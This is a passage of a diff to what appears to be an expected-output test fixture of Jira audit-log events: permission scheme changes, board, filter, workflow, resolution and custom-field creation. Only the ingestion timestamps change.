"{\"timestamp\":\"2021-11-22T00:08:34.168Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Resolve Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3448,7 +3442,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590346994Z", + "ingested": "2021-12-15T09:00:40.254658423Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.166Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assign Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3517,7 +3511,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590349592Z", + "ingested": "2021-12-15T09:00:40.254659629Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.165Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3586,7 +3580,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590352274Z", + "ingested": "2021-12-15T09:00:40.254661016Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.163Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3655,7 +3649,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590354853Z", + "ingested": "2021-12-15T09:00:40.254662186Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.151Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3724,7 +3718,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-08T14:50:33.590357430Z", + "ingested": "2021-12-15T09:00:40.254663455Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.142Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"action\":\"Permission scheme created\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Default scheme for Software projects.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Default software scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3793,7 +3787,7 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-08T14:50:33.590359989Z", + "ingested": "2021-12-15T09:00:40.254664784Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.072Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.boards\",\"category\":\"boards\",\"actionI18nKey\":\"Board created\",\"action\":\"Board created\"},\"affectedObjects\":[{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"},{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3856,7 +3850,7 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-08T14:50:33.590362644Z", + "ingested": "2021-12-15T09:00:40.254665971Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.887Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.filters\",\"category\":\"filters\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"action\":\"Filter created\"},\"affectedObjects\":[{\"name\":\"Filter for TEST board\",\"type\":\"FILTER\",\"uri\":\"http://jira.internal:8088/issues/?filter=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"from\":\"\"},{\"key\":\"JQL Query\",\"i18nKey\":\"jira.jql.query\",\"from\":\"\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"from\":\"\",\"to\":\"Filter for TEST board\"},{\"key\":\"Owner\",\"i18nKey\":\"common.concepts.owner\",\"from\":\"\",\"to\":\"test.user\"},{\"key\":\"Shared with\",\"i18nKey\":\"common.concepts.shared.with\",\"from\":\"[]\",\"to\":\"[Project: test (VIEW)]\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3952,7 +3946,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-08T14:50:33.590365213Z", + "ingested": "2021-12-15T09:00:40.254667234Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.746Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"action\":\"Workflow scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4015,7 +4009,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-08T14:50:33.590367757Z", + "ingested": "2021-12-15T09:00:40.254668441Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.732Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"action\":\"Workflow scheme created\"},\"affectedObjects\":[{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4084,7 +4078,7 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-08T14:50:33.590370355Z", + "ingested": "2021-12-15T09:00:40.254669701Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.710Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"action\":\"Workflow created\"},\"affectedObjects\":[{\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\",\"uri\":\"http://jira.internal:8088/secure/admin/workflows/ViewWorkflowSteps.jspa?workflowMode=live\u0026workflowName=Software Simplified Workflow for Project TEST\",\"id\":\"Software Simplified Workflow for Project TEST\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"key\":\"Status\",\"i18nKey\":\"common.words.status\",\"to\":\"To Do, In Progress, Done\"},{\"key\":\"Transition\",\"i18nKey\":\"admin.workflowtransition.transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4163,7 +4157,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590372882Z", + "ingested": "2021-12-15T09:00:40.254670888Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.537Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10003\",\"id\":\"10003\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}]}", "type": "info", "kind": "event" @@ -4227,7 +4221,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590375444Z", + "ingested": "2021-12-15T09:00:40.254672056Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Duplicate\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10002\",\"id\":\"10002\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"The problem is a duplicate of an existing issue.\"}]}", "type": "info", "kind": "event" @@ -4291,7 +4285,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590378057Z", + "ingested": "2021-12-15T09:00:40.254673289Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Won't Do\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10001\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"This issue won't be actioned.\"}]}", "type": "info", "kind": "event" @@ -4355,7 +4349,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590380754Z", + "ingested": "2021-12-15T09:00:40.254674500Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.534Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Done\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"Work has been completed on this issue.\"}]}", "type": "info", "kind": "event" @@ -4419,7 +4413,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590405219Z", + "ingested": "2021-12-15T09:00:40.254675729Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.088Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10111\",\"id\":\"customfield_10111\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Story Points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Number Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4493,7 +4487,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:33.590409522Z", + "ingested": "2021-12-15T09:00:40.254676983Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.037Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Story\",\"type\":\"ISSUE_TYPE\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -4554,7 +4548,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590412215Z", + "ingested": "2021-12-15T09:00:40.254678173Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.794Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10110\",\"id\":\"customfield_10110\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Rank\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Global Rank\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4628,7 +4622,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590414837Z", + "ingested": "2021-12-15T09:00:40.254679350Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.725Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10109\",\"id\":\"customfield_10109\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Epic Link Relationship\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4702,7 +4696,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590417466Z", + "ingested": "2021-12-15T09:00:40.254680949Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.694Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10108\",\"id\":\"customfield_10108\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Jira Software sprint field\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Sprint\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Jira Sprint Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4776,7 +4770,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590420053Z", + "ingested": "2021-12-15T09:00:40.254682171Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.669Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10107\",\"id\":\"customfield_10107\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Colour\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Colour of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4850,7 +4844,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590422686Z", + "ingested": "2021-12-15T09:00:40.254683370Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.644Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10106\",\"id\":\"customfield_10106\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Status\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Status of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4924,7 +4918,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590425305Z", + "ingested": "2021-12-15T09:00:40.254684537Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.522Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10105\",\"id\":\"customfield_10105\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Provide a short name to identify this epic.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Name\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Name of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4998,7 +4992,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:33.590427925Z", + "ingested": "2021-12-15T09:00:40.254685867Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.485Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -5059,7 +5053,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590430527Z", + "ingested": "2021-12-15T09:00:40.254687602Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.340Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target 